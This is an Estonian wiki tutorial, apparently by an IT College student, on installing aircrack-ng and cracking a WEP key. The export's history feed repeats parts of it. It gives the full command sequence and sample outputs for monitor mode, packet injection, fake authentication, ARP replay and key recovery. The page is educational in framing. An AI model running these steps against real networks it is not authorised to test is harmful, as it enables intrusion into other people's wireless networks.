&amp;lt;pre&amp;gt;Interface       Chipset         Driver&lt;br /&gt;
&lt;br /&gt;
wifi0           Atheros         madwifi-ng&lt;br /&gt;
ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kontrolli, kas kõik athX liidesed on ikka suletud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Märge:&#039;&#039;&#039; Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval &#039;&#039;airmon-ng stop athX&#039;&#039; käsuga sulgeda.&lt;br /&gt;
&lt;br /&gt;
Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wifi0 9&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav &#039;&#039;airmon-ng stop ath0&#039;&#039; käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt; Interface       Chipset         Driver&lt;br /&gt;
 &lt;br /&gt;
 wifi0           Atheros         madwifi-ng&lt;br /&gt;
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; “ath0” liides on märgitud nüüd kuulamisrežiimi.&lt;br /&gt;
&lt;br /&gt;
Veendumaks, et liides on korrektselt üles seatud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
ath0      IEEE 802.11g  ESSID:&amp;quot;&amp;quot;  Nickname:&amp;quot;&amp;quot;&lt;br /&gt;
       Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82   &lt;br /&gt;
       Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/3  &lt;br /&gt;
       Retry:off   RTS thr:off   Fragment thr:off&lt;br /&gt;
       Encryption key:off&lt;br /&gt;
       Power Management:off&lt;br /&gt;
       Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm&lt;br /&gt;
       Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
       Tx excessive retries:0  Invalid misc:0   Missed beacon:0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Kontrolli:&#039;&#039;&#039; Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng&#039;d jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 2: Testime „süstimise“ suutlikkust pääsupunktile&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_2_-_test_wireless_device_packet_injection Step 2 - Test Wireless Device Packet Injection]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.&lt;br /&gt;
 &lt;br /&gt;
Sisesta käsureale:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80  ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-9 - “süstimise” test&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-e teddy – raadiovõrgu nimi&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;ath0 – raadiovõrgu liides&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;09:23:35  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
09:23:35  Trying broadcast probe requests...&lt;br /&gt;
09:23:35  Injection is working!&lt;br /&gt;
09:23:37  Found 1 AP &lt;br /&gt;
&lt;br /&gt;
09:23:37  Trying directed probe requests...&lt;br /&gt;
09:23:37  00:14:6C:7E:40:80 - channel: 9 - &#039;teddy&#039;&lt;br /&gt;
09:23:39  Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73&lt;br /&gt;
09:23:39  30/30: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.  &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 3: Avada airodump-ng pakettide püüdmiseks&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_3_-_start_airodump-ng_to_capture_the_ivs Step 3 - Start airodump-ng to capture the IVs]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta: &lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-c 9 – raadiovõrgu kanal&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühenduda&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:&lt;br /&gt;
&amp;lt;pre&amp;gt;CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25 &lt;br /&gt;
                                                                                                              &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy                           &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 BSSID              STATION            PWR  Lost  Packets  Probes                                             &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782  &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 4: Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_4_-_use_aireplay-ng_to_do_a_fake_authentication_with_the_access_point Step 4 - Use aireplay-ng to do a fake authentication with the access point]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgitus:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-1 – võlts autentimine&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;0 – kordusühendus(t)e aeg sekundites&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Õnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ebaõnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;8:28:02  Sending Authentication Request&lt;br /&gt;
18:28:02  Authentication successful&lt;br /&gt;
18:28:02  Sending Association Request&lt;br /&gt;
18:28:02  Association successful :-)&lt;br /&gt;
18:28:02  Got a deauthentication packet!&lt;br /&gt;
18:28:05  Sending Authentication Request&lt;br /&gt;
18:28:05  Authentication successful&lt;br /&gt;
18:28:05  Sending Association Request&lt;br /&gt;
18:28:10  Sending Authentication Request&lt;br /&gt;
18:28:10  Authentication successful&lt;br /&gt;
18:28:10  Sending Association Request&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_5_-_start_aireplay-ng_in_arp_request_replay_mode Step 5 - Start aireplay-ng in ARP request replay mode]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;Saving ARP requests in replay_arp-0321-191525.cap&lt;br /&gt;
You should also start airodump-ng to capture replies.&lt;br /&gt;
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 6: Ava aircrack-ng salasõna lahti murdmiseks&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_6_-_run_aircrack-ng_to_obtain_the_wep_key Step 6 - Run aircrack-ng to obtain the WEP key]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken: &lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng -b 00:14:6C:7E:40:80 output*.cap&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&lt;br /&gt;
Selgitus:&lt;br /&gt;
&#039;&#039;-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;                             [00:03:06] Tested 674449 keys (got 96610 IVs)&lt;br /&gt;
&lt;br /&gt;
KB    depth   byte(vote)&lt;br /&gt;
 0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0) &lt;br /&gt;
 1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12) &lt;br /&gt;
 2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10) &lt;br /&gt;
 3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15) &lt;br /&gt;
&lt;br /&gt;
                      KEY FOUND! [ 12:34:56:78:90 ] &lt;br /&gt;
     Probability: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Kokkuvõte=&lt;br /&gt;
&lt;br /&gt;
aircrack-ng on lihtne ja käepärane vahend, millega lahti murda ilma suurema vaevata WiFi-võrkude paroole. Õppe-eesmärgil on kindlasti vägagi asjakohane antud tööriistaga tutvust teha, sest üpris kiirelt saab selgeks, kuivõrd lihtne on tegelikult kellegi koduvõrku tungida manipuleerides andmepakettidega ja kasutades selleks vaid ~15 käsku.&lt;br /&gt;
&lt;br /&gt;
=Kasutatud kirjandus=&lt;br /&gt;
&amp;lt;references /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Autor=&lt;br /&gt;
&lt;br /&gt;
Kelly Tragel [ISa 21]&amp;lt;br&amp;gt;&lt;br /&gt;
Viimati muudetud: 25.05.2015&lt;br /&gt;
&lt;br /&gt;
=Versioonide ajalugu=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Kuupäev &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Versioon &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 25.05.2015 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 1.0 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ktragel</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89364</id>
		<title>Aircrack</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89364"/>
		<updated>2015-05-26T09:16:14Z</updated>

		<summary type="html">&lt;p&gt;Ktragel: /* Üldkirjeldus */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Sissejuhatus=&lt;br /&gt;
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit, demonstreerides üht näitelahendust.&lt;br /&gt;
&lt;br /&gt;
==Üldkirjeldus==&lt;br /&gt;
&lt;br /&gt;
aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm&amp;lt;ref&amp;gt;[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#description Description]&amp;lt;/ref&amp;gt;. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu&amp;lt;ref&amp;gt;[https://web.archive.org/web/20120805024038/http://www.grape-info.com/doc/linux/config/aircrack-ng-0.6.html Aircrack-ng (WEP, WPA-PSK Crack)]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
* airodump-ng - programm pakettide püüdmiseks &lt;br /&gt;
* aireplay-ng - programm pakettide „süstimiseks“ &lt;br /&gt;
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija&lt;br /&gt;
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks&lt;br /&gt;
&lt;br /&gt;
==Süntaks==&lt;br /&gt;
&lt;br /&gt;
aircrack-ng süntaks näeb välja järgmine&amp;lt;ref&amp;gt;[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#usage Usage]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng [võti] &amp;lt;püütud fail(id)&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&amp;amp;DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]&lt;br /&gt;
&lt;br /&gt;
=Eeldused=&lt;br /&gt;
&lt;br /&gt;
* Elementaarne käsurea kasutamisoskus&lt;br /&gt;
* Teadmised WiFi, WEP, WPA/WPA2 kohta&lt;br /&gt;
* Võrgus vähemalt 1 aktiivne klient&lt;br /&gt;
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)&lt;br /&gt;
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)&lt;br /&gt;
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])&lt;br /&gt;
&lt;br /&gt;
WiFi adapteri vaatamine&amp;lt;ref&amp;gt;[https://wiki.debian.org/HowToIdentifyADevice/PCI PCI ]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
&amp;lt;pre&amp;gt;lspci -nn | grep Network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või rohkema informatsiooni saamiseks&amp;lt;ref&amp;gt;[http://www.cyberciti.biz/faq/linux-list-network-cards-command/ HowTo: Linux Show List Of Network Cards]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;lshw -class network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemuseks saame midagi sarnast:&lt;br /&gt;
&amp;lt;pre&amp;gt;02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;*-network&lt;br /&gt;
       description: Wireless interface&lt;br /&gt;
       product: Centrino Advanced-N 6205 [Taylor Peak]&lt;br /&gt;
       vendor: Intel Corporation&lt;br /&gt;
       physical id: 0&lt;br /&gt;
       bus info: pci@0000:02:00.0&lt;br /&gt;
       logical name: wlan0&lt;br /&gt;
       version: 34&lt;br /&gt;
       serial: 6c:88:14:1d:29:c4&lt;br /&gt;
       width: 64 bits&lt;br /&gt;
       clock: 33MHz&lt;br /&gt;
       capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless&lt;br /&gt;
       configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn&lt;br /&gt;
       resources: irq:32 memory:f7d00000-f7d01fff&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;&amp;lt;!-- Warning style viksitud ArchWikist --&amp;gt;div style=&amp;quot;padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;&amp;quot;&amp;gt;&#039;&#039;&#039;Pane tähele! &#039;&#039;&#039;Antud juhend on koostatud kasutades Ubuntu 15.04 (Vivid Vervet) ja Aircrack-ng 1.2 RC2 versioone. &amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Installeerimine=&lt;br /&gt;
&lt;br /&gt;
Uuendame repositooriumi:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get update&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt&amp;lt;ref&amp;gt;[http://askubuntu.com/questions/294651/step-by-step-guide-to-install-aircrack-ng-suite-on-ubuntu-12-04-lts Step by Step guide to install aircrack-ng suite on ubuntu 12.04 LTS [duplicate]]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get install aircrack-ng&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=WEP võtme murdmine=&lt;br /&gt;
&lt;br /&gt;
Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#equipment_used Equipment used]&amp;lt;/ref&amp;gt;: &lt;br /&gt;
* Arvuti MAC aadress, mis jooksutab aircrack-ng&#039;d: 00:0F:B5:88:AC:82&lt;br /&gt;
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80&lt;br /&gt;
* ESSID (võrgu nimi): teddy&lt;br /&gt;
* Pääsupunkti kanal: 9&lt;br /&gt;
* Raadiovõrgu liides (ingl. k Wireless interface): ath0&lt;br /&gt;
&lt;br /&gt;
==Eesmärk==&lt;br /&gt;
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview]&amp;lt;/ref&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
==Lühikesed tegevussammud==&lt;br /&gt;
Lühidalt sammudest, mida tegema asume&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview - the basic steps]&amp;lt;/ref&amp;gt;:&amp;lt;br&amp;gt;&lt;br /&gt;
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode)&amp;lt;br&amp;gt;&lt;br /&gt;
2. Testime „süstimise“ suutlikkust pääsupunktile &amp;lt;br&amp;gt;&lt;br /&gt;
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
4. Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga &amp;lt;br&amp;gt;&lt;br /&gt;
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette&amp;lt;br&amp;gt;&lt;br /&gt;
6. Kasutada aircrack-ng&#039;d salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Näide WEP võtme lahti murdmise protsessist==&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_1_-_start_the_wireless_interface_in_monitor_mode_on_ap_channel Step 1 - Start the wireless interface in monitor mode on AP channel]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.&lt;br /&gt;
 &lt;br /&gt;
Peata ath0 liides:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng stop ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;Interface       Chipset         Driver&lt;br /&gt;
&lt;br /&gt;
wifi0           Atheros         madwifi-ng&lt;br /&gt;
ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kontrolli, kas kõik athX liidesed on ikka suletud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Märge:&#039;&#039;&#039; Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval &#039;&#039;airmon-ng stop athX&#039;&#039; käsuga sulgeda.&lt;br /&gt;
&lt;br /&gt;
Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wifi0 9&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav &#039;&#039;airmon-ng stop ath0&#039;&#039; käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt; Interface       Chipset         Driver&lt;br /&gt;
 &lt;br /&gt;
 wifi0           Atheros         madwifi-ng&lt;br /&gt;
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; “ath0” liides on märgitud nüüd kuulamisrežiimi.&lt;br /&gt;
&lt;br /&gt;
Veendumaks, et liides on korrektselt üles seatud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
ath0      IEEE 802.11g  ESSID:&amp;quot;&amp;quot;  Nickname:&amp;quot;&amp;quot;&lt;br /&gt;
       Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82   &lt;br /&gt;
       Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/3  &lt;br /&gt;
       Retry:off   RTS thr:off   Fragment thr:off&lt;br /&gt;
       Encryption key:off&lt;br /&gt;
       Power Management:off&lt;br /&gt;
       Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm&lt;br /&gt;
       Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
       Tx excessive retries:0  Invalid misc:0   Missed beacon:0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Kontrolli:&#039;&#039;&#039; Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng&#039;d jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
